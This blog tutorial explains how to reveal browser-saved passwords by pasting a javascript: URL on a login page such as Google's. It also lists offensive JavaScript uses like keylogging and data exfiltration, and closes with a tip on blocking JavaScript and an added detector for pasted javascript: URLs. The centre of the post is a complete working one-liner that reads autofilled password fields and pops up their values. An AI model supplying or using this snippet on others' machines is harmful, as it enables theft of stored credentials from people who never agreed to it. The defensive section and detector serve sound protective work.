The Hackr

Reveal Saved Passwords in Browser using JavaScript Injection

JavaScript is a high-level, dynamic, untyped, and interpreted run-time language. The majority of websites use it, and all modern web browsers support it without the need for any plugins. But along with this come additional security issues that need to be considered and tested for.

JavaScript can be used for malicious purposes as well as good ones.
The primary use of JS is to write functions that are embedded in or included from HTML pages and that interact with the page's Document Object Model (DOM). This is what makes pages interactive, and it also means that any script running in a page can read and change what the browser shows there. You can also see our tutorial for an alternative way of revealing saved passwords in the browser.

So, in what ways can we use JavaScript as a pentester?

  • JavaScript HTML form modification
  • JavaScript Cookie modification
  • Injecting JavaScript into existing pages
  • Keystroke logging
  • Capturing clicks
  • Hijacking form submit
  • Setting up event listeners
  • Stealing auto-complete data
  • Data exfiltration using XMLHttpRequest
  • CSRF token stealing

Demo

So, today we are going to do a cool, quick JavaScript hack that can reveal passwords that are saved in the browser.

Step 1 Open the desired website login-page

Go to the login page of the website whose saved password you want to reveal using the JS injection technique. In my case it is ‘Google login’. We can see that auto-fill has already filled the password field with asterisks or dots.

Let's say the URL here is:
https://accounts.google.com/signin/v2/sl/pwd?hl=en&passive=true&continue=https%3A%2F%2Fwww.google.co.in%2F%3Fauthuser%3D2&flowName=GlifWebSignIn&flowEntry=AddSession&cid=0&navigationDirection=forward

Step 2 Code for JavaScript Injection

Now that we are at the login page with the password field already filled with asterisks, replace the whole URL in the address bar with:
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}

Note

Don’t forget to include the javascript: prefix at the start of the injection code!

Step 3 Saved password popup

So, now a pop-up pops up right in the browser revealing the saved password!


How to save yourself from JavaScript Injection

There are a lot of measures you can choose from to protect yourself from this kind of hack.
The easiest way is to disable the JavaScript permission for specific login pages that you feel are vulnerable to this kind of hack.

Simple yet instant way –

You can simply do it by right-clicking on the page settings and disabling the JavaScript permission by selecting ‘Always block on this site’ in the drop-down menu, as shown in the figure below!
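
A complementary check, as an added example that is not part of the original post: the technique in Step 2 depends on text beginning with javascript: being handed to the browser, so a help-desk tool or paste filter can flag such text before it runs. The function names and sample strings are constructed for illustration, and the whitespace handling follows the WHATWG URL parsing rules.

```javascript
// Added example: flag text that a URL parser would treat as a javascript: URL.
// Function names and sample strings are constructed for illustration.

// Mirror the URL parser's preprocessing: strip leading/trailing C0 control
// characters and spaces, then remove every ASCII tab and newline.
function normalizeUrlInput(text) {
  return text
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// True when the normalized text starts with the javascript: scheme
// (scheme names are case-insensitive).
function isJavascriptUrl(text) {
  return /^javascript:/i.test(normalizeUrlInput(text));
}

// Classify the text and record which sensitive page data the script body
// refers to, such as the password fields read by the Step 2 snippet.
function reviewPastedText(text) {
  if (!isJavascriptUrl(text)) {
    return { verdict: 'ok', reasons: [] };
  }
  const body = normalizeUrlInput(text).slice('javascript:'.length);
  const reasons = ['runs script in the current page'];
  if (/password/i.test(body)) reasons.push('references password fields');
  if (/\.value\b/.test(body)) reasons.push('reads form field values');
  if (/document\.cookie/i.test(body)) reasons.push('touches cookies');
  return { verdict: 'block', reasons };
}

// Constructed samples: a normal URL, two javascript: URLs with different
// casing and whitespace, and ordinary prose that merely mentions the scheme.
const samples = [
  'https://example.com/login',
  "javascript:alert('hi')",
  "  JavaScript: if (e.type=='password') prompt('', e.value)",
  'java\tscript:void(document.cookie)',
  'how do I use javascript: links?',
];
for (const s of samples) {
  const r = reviewPastedText(s);
  console.log(r.verdict.padEnd(5), JSON.stringify(s.slice(0, 40)), r.reasons.join('; '));
}
```

Matching on the normalized text rather than the raw string is what catches the mixed-case and embedded-tab variants.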


If you guys find this helpful, let us know in the comments below!

Sreehas
